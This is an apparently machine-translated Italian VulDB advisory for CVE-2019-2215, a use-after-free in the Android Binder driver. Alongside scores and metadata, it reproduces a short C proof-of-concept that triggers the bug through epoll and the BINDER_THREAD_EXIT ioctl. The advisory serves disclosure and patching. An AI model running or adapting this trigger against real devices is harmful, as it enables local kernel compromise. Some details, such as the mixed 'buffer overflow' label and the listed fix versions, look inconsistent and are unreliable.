VDB-142991 · CVE-2019-2215 · sa-20191030-01

Google Android 4.4 Binder Driver binder_poll buffer overflow

CVSS Punteggio meta temporaneo	Prezzo attuale dell'exploit (≈)	Punteggio di interesse CTI
6.4	$0-$5k	0.00

Riassuntoinformazioni

Una vulnerabilità di livello critico è stata rilevata in Google Android 4.4. Riguarda la funzione binder_poll del componente Binder Driver. La manipolazione di un input sconosciuto se causa una vulnerabilità di classe buffer overflow. Questa vulnerabilità è conosciuta come CVE-2019-2215. L'attacco deve essere locale. Inoltre, è presente un exploit disponibile. È raccomandato aggiornare il componente coinvolto.

Dettagliinformazioni

Un punto di debole di livello critico è stato rilevato in Google Android 4.4 (Smartphone Operating System). É interessato la funzione binder_poll del componente Binder Driver. Attraverso la manipolazione di un input sconosciuto conseguenza di una vulerabilità di classe buffer overflow. Questo si osserva su riservatezza, integrità e disponibilità.

La vulnerabilità è stata pubblicata in data 27/09/2019 con un bug report (Website) (confermato). L'advisory è scaricabile da bugs.chromium.org. CVE-2019-2215 è identificato come punto debole. L'attacco deve essere locale. Nessuna autentificazione è richiesta per l'uso. I dettagli tecnici e un pubblico metodo di utilizzo sono conosciuti.

immediatamente dopo, è stato diffuso un exploit. L'exploit è scaricabile da bugs.chromium.org. È stato dichiarato come attaccato. Il codice utilizzato dal exploit è:

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main()
{
		int fd, epfd;
		struct epoll_event event = { .events = EPOLLIN };

		fd = open("/dev/binder0", O_RDONLY);
		epfd = epoll_create(1000);
		epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
		ioctl(fd, BINDER_THREAD_EXIT, NULL);
}

L'aggiornamento alla versione 3.8, 4.14 LTS o 4.9 elimina questa vulnerabilità.

La vulnerabilità è documentata anche nei database Exploit-DB (47463). Be aware that VulDB is the high quality source for vulnerability data.

Prodottoinformazioni

Genere

Smartphone Operating System

Fornitore

Google

Nome

Android

Versione

Licenza

gratuito

Sito web

Fornitore: https://www.google.com/

CPE 2.3informazioni

CPE 2.2informazioni

CVSSv4informazioni

VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv3informazioni

VulDB Punteggio meta-base: 6.5
VulDB Punteggio meta temporaneo: 6.4

VulDB Punteggio di base: 5.3
VulDB Punteggio temporaneo: 5.1
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 7.8
NVD Vettore: 🔍

CVSSv2informazioni

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

Vettore	Complessità	Autenticazione	Riservatezza	Integrità	Disponibilità
Sbloccare	Sbloccare	Sbloccare	Sbloccare	Sbloccare	Sbloccare
Sbloccare	Sbloccare	Sbloccare	Sbloccare	Sbloccare	Sbloccare
Sbloccare	Sbloccare	Sbloccare	Sbloccare	Sbloccare	Sbloccare

VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 🔍

Sfruttamentoinformazioni

Classe: Buffer overflow
CWE: CWE-416 / CWE-119
CAPEC: 🔍
ATT&CK: 🔍

Fisico: Parzialmente
Locale: Si
Remoto: No

Disponibilità: 🔍
Accesso: Pubblico
Stato: Attaccato
Scaricare: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

KEV Aggiunto: 🔍
KEV Entro quando: 🔍
KEV Contromisure: 🔍
KEV Ransomware: 🔍
KEV Avviso: 🔍

Previsione dei prezzi: 🔍
Preventivo attuale: 🔍